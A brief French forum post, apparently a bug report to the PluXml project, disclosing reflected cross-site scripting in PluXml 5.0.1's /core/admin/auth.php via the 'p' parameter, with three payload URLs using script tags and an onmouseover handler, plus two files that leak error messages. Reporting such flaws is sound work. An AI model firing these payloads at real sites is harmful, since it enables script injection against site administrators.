Pluxml 5.0.1 - xss

smed79smed79 Member
bonjour,

j'ai trouvé ça:

XSS (auth.php)
/core/admin/auth.php?p=1>"><ScRiPt%20%0d%0a>alert(123)%3B</ScRiPt>

/core/admin/auth.php?p=/pluxml/core/admin/?>"'><ScRiPt>alert(123)</ScRiPt>

/core/admin/auth.php?p=%F6"+onmouseover=prompt(123)//
Message d'erreur
/core/lib/class.plx.feed.php
/core/lib/class.plx.admin.php
@++

Réponses

Connectez-vous ou Inscrivez-vous pour répondre.